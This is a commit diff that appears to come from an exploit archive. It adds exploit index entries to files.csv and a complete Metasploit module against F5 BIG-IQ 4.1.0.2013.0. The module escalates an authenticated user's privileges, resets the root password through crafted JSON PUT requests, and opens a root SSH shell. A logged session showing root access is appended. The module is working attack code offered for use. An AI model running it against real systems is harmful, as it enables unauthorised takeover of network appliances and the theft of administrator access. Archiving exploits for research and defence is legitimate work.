pythonmaster41
diff --git a/‎files.csv‎
Lines changed: 25 additions & 1 deletion b/‎files.csv‎
Lines changed: 25 additions & 1 deletion
diff --git a/‎platforms/hardware/remote/33143.rb‎
Lines changed: 235 additions & 0 deletions b/‎platforms/hardware/remote/33143.rb‎
Lines changed: 235 additions & 0 deletions
@@ -8585,7 +8585,7 @@ id,file,description,date,author,platform,type,port
 9101,platforms/php/webapps/9101.txt,"phpbms 0.96 Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps,0
 9102,platforms/windows/dos/9102.pl,"PatPlayer 3.9 (M3U File) Local Heap Overflow PoC",2009-07-10,Cyber-Zone,windows,dos,0
 9103,platforms/php/webapps/9103.txt,"gencms 2006 Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps,0
-9104,platforms/windows/local/9104.py,"Photo DVD Maker Pro <= 8.02 (.pdm) Local BOF Exploit (SEH)",2009-07-10,His0k4,windows,local,0
+9104,platforms/windows/local/9104.py,"Photo DVD Maker Pro <= 8.02 - (.pdm) Local BOF Exploit (SEH)",2009-07-10,His0k4,windows,local,0
 9105,platforms/php/webapps/9105.txt,"MyMsg 1.0.3 (uid) Remote SQL Injection Vulnerability",2009-07-10,Monster-Dz,php,webapps,0
 9106,platforms/windows/remote/9106.txt,"citrix xencenterweb (xss/sql/rce) Multiple Vulnerabilities",2009-07-10,"Secure Network",windows,remote,0
 9107,platforms/php/webapps/9107.txt,"Phenotype CMS 2.8 (login.php user) Blind SQL Injection Vulnerability",2009-07-10,IRCRASH,php,webapps,0
@@ -29734,6 +29734,7 @@ id,file,description,date,author,platform,type,port
 32987,platforms/multiple/remote/32987.txt,"Woodstock 4.2 404 Error Page Cross Site Scripting Vulnerability",2009-05-05,DSecRG,multiple,remote,0
 32988,platforms/php/webapps/32988.txt,"VerliAdmin 0.3 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-05-05,TEAMELITE,php,webapps,0
 32989,platforms/php/webapps/32989.txt,"Verlihub Control Panel 1.7 Multiple Cross-Site Scripting Vulnerabilities",2009-05-06,TEAMELITE,php,webapps,0
+32990,platforms/hardware/webapps/32990.pl,"HP Laser Jet - JavaScript Persistent XSS via PJL Directory Traversal",2014-04-23,@0x00string,hardware,webapps,0
 32991,platforms/php/webapps/32991.txt,"Claroline 1.8.11 'claroline/linker/notfound.php' Cross-Site Scripting Vulnerability",2009-05-08,"Gerendi Sandor Attila",php,webapps,0
 32992,platforms/php/webapps/32992.txt,"MagpieRSS 0.72 Cross Site Scripting And HTML Injection Vulnerabilities",2009-05-08,"Justin Klein Keane",php,webapps,0
 32993,platforms/php/webapps/32993.txt,"Dacio's Image Gallery 1.6 Multiple Remote Vulnerabilities",2009-05-11,ahmadbady,php,webapps,0
@@ -29762,6 +29763,7 @@ id,file,description,date,author,platform,type,port
 33016,platforms/hardware/remote/33016.txt,"SonicWALL SSL-VPN 'cgi-bin/welcome/VirtualOffice' Remote Format String Vulnerability",2009-05-29,"Patrick Webster",hardware,remote,0
 33017,platforms/linux/dos/33017.txt,"Adobe Acrobat <= 9.1.3 - Stack Exhaustion Denial of Service Vulnerability",2009-05-29,"Saint Patrick",linux,dos,0
 33018,platforms/windows/dos/33018.txt,"cFos Personal Net 3.09 - Remote Heap Memory Corruption Denial of Service",2014-04-25,LiquidWorm,windows,dos,0
+33019,platforms/multiple/webapps/33019.txt,"miSecureMessages 4.0.1 - Session Management & Authentication Bypass Vulnerabilities",2014-04-25,"Jared Bird",multiple,webapps,0
 33020,platforms/linux/dos/33020.py,"CUPS <= 1.3.9 'cups/ipp.c' NULL Pointer Dereference Denial Of Service Vulnerability",2009-06-02,"Anibal Sacco",linux,dos,0
 33021,platforms/php/webapps/33021.txt,"PHP-Nuke 8.0 Downloads Module 'query' Parameter Cross Site Scripting Vulnerability",2009-06-02,"Schap Security",php,webapps,0
 33022,platforms/php/webapps/33022.txt,"Joomla! Prior to 1.5.11 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2009-06-03,"Airton Torres",php,webapps,0
@@ -29874,3 +29876,25 @@ id,file,description,date,author,platform,type,port
 33134,platforms/linux/dos/33134.txt,"Adobe Flash Player <= 10.0.22 and AIR - 'intf_count' Integer Overflow Vulnerability",2009-07-30,"Roee Hay",linux,dos,0
 33136,platforms/hardware/webapps/33136.txt,"Fritz!Box - Remote Command Execution Exploit",2014-05-01,0x4148,hardware,webapps,0
 33138,platforms/hardware/webapps/33138.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Stored XSS Vulnerability",2014-05-01,"Dolev Farhi",hardware,webapps,0
+33141,platforms/php/remote/33141.rb,"AlienVault OSSIM SQL Injection and Remote Code Execution",2014-05-02,metasploit,php,remote,443
+33142,platforms/multiple/remote/33142.rb,"Apache Struts ClassLoader Manipulation Remote Code Execution",2014-05-02,metasploit,multiple,remote,8080
+33143,platforms/hardware/remote/33143.rb,"F5 BIG-IQ 4.1.0.2013.0 - Privilege Escalation",2014-05-02,"Brandon Perry",hardware,remote,443
+33144,platforms/php/webapps/33144.txt,"Censura Prior to 2.1.1 Multiple Cross Site Scripting Vulnerabilities",2009-06-29,mark99,php,webapps,0
+33145,platforms/linux/local/33145.c,"PHP Fuzzer Framework Default Location Insecure Temporary File Creation Vulnerability",2009-08-03,"Melissa Elliott",linux,local,0
+33146,platforms/php/webapps/33146.txt,"CS-Cart 2.0.5 'reward_points.post.php' SQL Injection Vulnerability",2009-08-04,"Ryan Dewhurst",php,webapps,0
+33147,platforms/php/webapps/33147.txt,"AJ Auction Pro 3.0 'txtkeyword' Parameter Cross Site Scripting Vulnerability",2009-08-05,"599eme Man",php,webapps,0
+33148,platforms/linux/dos/33148.c,"Linux Kernel 2.6.x 'posix-timers.c' NULL Pointer Dereference Denial of Service Vulnerability",2009-08-06,"Hiroshi Shimamoto",linux,dos,0
+33149,platforms/php/webapps/33149.txt,"Alkacon OpenCms 7.x Multiple Input Validation Vulnerabilities",2009-08-06,"Katie French",php,webapps,0
+33150,platforms/hardware/webapps/33150.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - CSRF Vulnerability",2014-05-03,"Dolev Farhi",hardware,webapps,0
+33152,platforms/php/webapps/33152.txt,"PhotoPost PHP 3.3.1 'cat' Parameter Cross Site Scripting and SQL Injection Vulnerabilities",2009-08-07,"599eme Man",php,webapps,0
+33153,platforms/php/webapps/33153.txt,"SupportPRO SupportDesk 3.0 'shownews.php' Cross Site Scripting Vulnerability",2009-08-10,Moudi,php,webapps,0
+33154,platforms/php/webapps/33154.txt,"SQLiteManager 1.2 'main.php' Cross Site Scripting Vulnerability",2009-08-10,"Hadi Kiamarsi",php,webapps,0
+33155,platforms/php/webapps/33155.txt,"ViArt CMS forums.php category_id Parameter XSS",2009-08-10,Moudi,php,webapps,0
+33156,platforms/php/webapps/33156.txt,"Crime24 Stealer Panel 1.0 - Multiple Vulnerabilities",2014-05-03,"Daisuke Dan",php,webapps,0
+33157,platforms/php/webapps/33157.txt,"ViArt CMS forum.php forum_id Parameter XSS",2009-08-10,Moudi,php,webapps,0
+33158,platforms/php/webapps/33158.txt,"ViArt CMS forum_topic_new.php forum_id Parameter XSS",2009-08-10,Moudi,php,webapps,0
+33159,platforms/hardware/webapps/33159.txt,"Seagate BlackArmor NAS - Multiple Vulnerabilities",2014-05-03,"Shayan S",hardware,webapps,0
+33160,platforms/php/webapps/33160.txt,"Papoo 3.x Upload Images Arbitrary File Upload Vulnerability",2009-08-10,"RedTeam Pentesting GmbH",php,webapps,0
+33161,platforms/php/local/33161.php,"PHP 5.3 'mail.log' Configuration Option 'open_basedir' Restriction Bypass Vulnerability",2009-08-10,"Maksymilian Arciemowicz",php,local,0
+33162,platforms/php/remote/33162.php,"PHP 5.2.10/5.3 'ini_restore()' Memory Information Disclosure Vulnerability (1)",2009-08-10,"Maksymilian Arciemowicz",php,remote,0
+33163,platforms/php/remote/33163.php,"PHP 5.2.10/5.3 'ini_restore()' Memory Information Disclosure Vulnerability (2)",2009-08-10,"Maksymilian Arciemowicz",php,remote,0
@@ -0,0 +1,235 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'json'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "F5 BIG-IQ v4.1.0.2013.0 authenticated arbitrary user password change",
+      'Description'    => %q{
+      F5 BIG-IQ v4.1.0.2013.0 is vulnerable to a privilege escalation attack which allows
+      an attacker to change the root users password. This module does just this, then SSH's in.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Brandon Perry <bperry.volatile@gmail.com>'
+        ],
+      'References'     =>
+        [
+          ['URL', 'http://volatile-minds.blogspot.com/2014/05/f5-big-iq-v41020130-authenticated.html']
+        ],
+      'Platform'       => ['unix'],
+      'Arch'           => ARCH_CMD,
+      'Targets'        =>
+        [
+          ['BIG-IQ 4.1.0.2013.0', {}]
+        ],
+      'Privileged'     => true,
+      'DefaultOptions'  =>
+      {
+        'SSL' => true,
+        'ExitFunction' => "none"
+      },
+      'Payload'        =>
+      {
+        'Compat' => {
+          'PayloadType'    => 'cmd_interact',
+          'ConnectionType' => 'find'
+        }
+      },
+      'DisclosureDate' => "Sep 23 2013",
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          Opt::RPORT(443),
+          OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']),
+          OptString.new('USERNAME', [true, 'The user to authenticate as.', 'username']),
+          OptString.new('PASSWORD', [true, 'The password to authenticate with.', 'password']),
+          OptString.new('ADMINISTRATOR', [true, 'The administrator to spoof for privilege escalation', 'root']),
+          OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
+        ], self.class)
+  end
+
+  def exploit
+    post = {
+      'username' => datastore['USERNAME'],
+      'passwd' => datastore['PASSWORD']
+    }
+
+    print_status("Authenticating as " + datastore['USERNAME'])
+
+    #Simple post to get us a cookie so we can change our password
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => '/ui/actions/logmein.html',
+      'vars_post' => post
+    })
+
+    if res.headers["Location"] != "/"
+      fail_with("Authentication failed")
+    end
+
+    cookie = res.get_cookies
+
+    #this gets turned into JSON
+    #
+    #generation will be set in try_generation if it isn't correct
+    #
+    #This is also the attempt at privilege escalation, so we preserve the password
+    post = {
+      "name" => datastore['ADMINISTRATOR'],
+      "displayName" => "fdsa",
+      "generation" => 1,
+      "lastUpdateMicros" => 1395360806678747,
+      "kind" => "shared:authz:users:usersworkerstate",
+      "selfLink" => "https://localhost/mgmt/shared/authz/users/" + datastore['USERNAME'],
+      "password" => datastore['PASSWORD'],
+      "password2" => datastore['PASSWORD'],
+      "state" => "ACTIVE"
+    }
+
+    print_status("Escalating privileges to that of " + datastore["ADMINISTRATOR"])
+
+    try_generation(post, cookie, '/mgmt/shared/authz/users/' + datastore['USERNAME'])
+
+    password = Rex::Text.rand_text_alpha(rand(32)+5)
+
+    #this is when we change the password for the root user
+    post = {
+      "name" => "root",
+      "displayName" => "root",
+      "generation" => 1,
+      "lastUpdateMicros" => 1395359570236413,
+      "kind" => "shared:authz:users:usersworkerstate",
+      "selfLink" => "https://localhost/mgmt/shared/authz/users/root",
+      "password" => password,
+      "password2" => password,
+      "state" => "ACTIVE"
+    }
+
+    select(nil,nil,nil,5)
+    print_status("Changing root user password to " + password)
+
+    try_generation(post, cookie, '/mgmt/shared/authz/users/root')
+
+    res = do_login('root', password)
+
+    if res
+      print_good("Login Successful with 'root:#{password}'")
+      handler(res.lsock)
+    end
+  end
+
+  def try_generation(put, cookie, uri)
+    done = false
+    while !done
+      res = send_request_cgi({
+        'method' => "PUT",
+        'uri' => uri,
+        'data' => put.to_json,
+        'cookie' => cookie
+      })
+
+      if res and res.body =~ /Invalid generation/
+        put['generation'] = /Need (\d{1,9}), received \d{1,9}/.match(res.body)[1]
+      elsif res and res.body =~ /encryptedPassword/
+        done = true
+      else
+        fail_with("Didn't get a response that I expected")
+      end
+    end
+  end
+    def do_login(user, pass)
+
+      opts = {
+        :auth_methods => ['password', 'keyboard-interactive'],
+        :msframework  => framework,
+        :msfmodule    => self,
+        :port         => 22,
+        :disable_agent => true,
+        :config => true,
+        :password => pass,
+        :record_auth_info => true,
+        :proxies => datastore['Proxies']
+      }
+
+      opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+
+      begin
+        ssh = nil
+        ssh = Net::SSH.start(datastore['RHOST'], user, opts)
+      rescue Rex::ConnectionError, Rex::AddressInUse
+        return nil
+      rescue Net::SSH::Disconnect, ::EOFError
+        print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
+        return nil
+      rescue ::Timeout::Error
+        print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
+        return nil
+      rescue Net::SSH::AuthenticationFailed
+        print_error "#{rhost}:#{rport} SSH - Failed authentication"
+        return nil
+      rescue Net::SSH::Exception => e
+        print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
+        return nil
+      end
+      if ssh
+        conn = Net::SSH::CommandStream.new(ssh, '/bin/sh', true)
+        return conn
+      end
+      return nil
+    end
+end
+
+
+__END__
+
+msf exploit(f5_bigiq_passwd_update) > show options
+
+Module options (exploit/linux/http/f5_bigiq_passwd_update):
+
+Name           Current Setting  Required  Description
+----           ---------------  --------  -----------
+ADMINISTRATOR  root             yes       The administrator to spoof for privilege escalation
+PASSWORD       notpassword      yes       The password to authenticate with.
+Proxies                         no        Use a proxy chain
+RHOST          192.168.1.8      yes       The target address
+RPORT          443              yes       The target port
+SSH_TIMEOUT    30               no        Specify the maximum time to negotiate a SSH session
+TARGETURI      /                yes       The URI of the vulnerable instance
+USERNAME       username         yes       The user to authenticate as.
+VHOST                           no        HTTP server virtual host
+
+
+Payload options (cmd/unix/interact):
+
+Name  Current Setting  Required  Description
+
+----  ---------------  --------  -----------
+
+Exploit target:
+
+Id  Name
+--  ----
+0   a
+
+
+msf exploit(f5_bigiq_passwd_update) > exploit
+
+[+] Login Successful with 'root:qBvBY'
+[*] Found shell.
+[*] Command shell session 3 opened (192.168.1.31:58165 -> 192.168.1.8:22) at 2014-03-20 21:18:09 -0500
+
+id
+uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t:SystemLow-SystemHigh